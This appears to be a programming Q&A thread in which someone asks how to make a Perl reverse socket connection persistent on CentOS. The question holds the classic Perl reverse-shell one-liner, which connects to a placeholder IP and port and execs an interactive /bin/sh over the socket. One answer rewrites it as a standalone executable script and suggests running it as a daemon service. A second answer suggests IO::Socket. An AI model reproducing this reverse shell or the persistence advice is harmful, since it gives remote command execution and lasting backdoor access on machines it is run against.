# how can i create persistent socket connection on perl?

Tags: linux, perl, sockets, connection, reverse

I'm learning Perl and I have two Linux systems (server/client). I want to connect them via Perl with a reverse socket connection.

The way I do it is with this command on the server side:

```
perl -e 'use Socket;
  $i="**iphere**";
  $p=**porthere**;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
  if(connect(S,sockaddr_in($p,inet_aton($i)))){ 
    open(STDIN,">&S");
    open(STDOUT,">&S");
    open(STDERR,">&S");
    exec("/bin/sh -i");
  };'
```

This works fine, but I want to make it persistent on time. Maybe executing some delayed script.

The server system is *CentOS*.

Any idea?

Answer (score 1):

Well, step one would be to take your command-line script and turn it into a real program. Put it in a file called `my_server` and reformat it like this (to make it easier to maintain).

```
use Socket;

$i = "**iphere**";
$p = **porthere**;

socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));

if (connect(S, sockaddr_in($p, inet_aton($i)))) {
  open(STDIN, ">&S");
  open(STDOUT, ">&S");
  open(STDERR, ">&S");
  exec("/bin/sh -i");
}
```

You can now run that by typing `perl my_server` at the command line. We can make it look more like a command by adding a shebang line and making it executable. At this point I'm also going to add Perl's safety nets, `use strict` and `use warnings` (which you should always have in your Perl code), and they will require us to define our variables with `my`.

```
#!/usr/bin/env perl

use strict;
use warnings;

use Socket;

my $i = "**iphere**";
my $p = **porthere**;

socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));

if (connect(S, sockaddr_in($p, inet_aton($i)))) {
  open(STDIN, ">&S");
  open(STDOUT, ">&S");
  open(STDERR, ">&S");
  exec("/bin/sh -i");
}
```

If we now make that executable (`chmod +x my_server`), we can now run it by just typing the program's name (`my_server`) on the command line.

The next step would be to make it into a proper service which you can start, stop and monitor using your OS's native service capabilities. I don't have time to get into that in detail, but I'd be looking at [Daemon::Control](https://metacpan.org/release/Daemon-Control).

Answer (score 1):

You're kinda using Old school, C like of socket programming in perl which is good but remember it's Perl.  To make it more readable and simple, you can always use `IO::Socket`.  Which improves code readability and reduces code complexity.  Also in production environment, I would recommend you to add server IP's in `/etc/hosts` and use the host name instead of IP.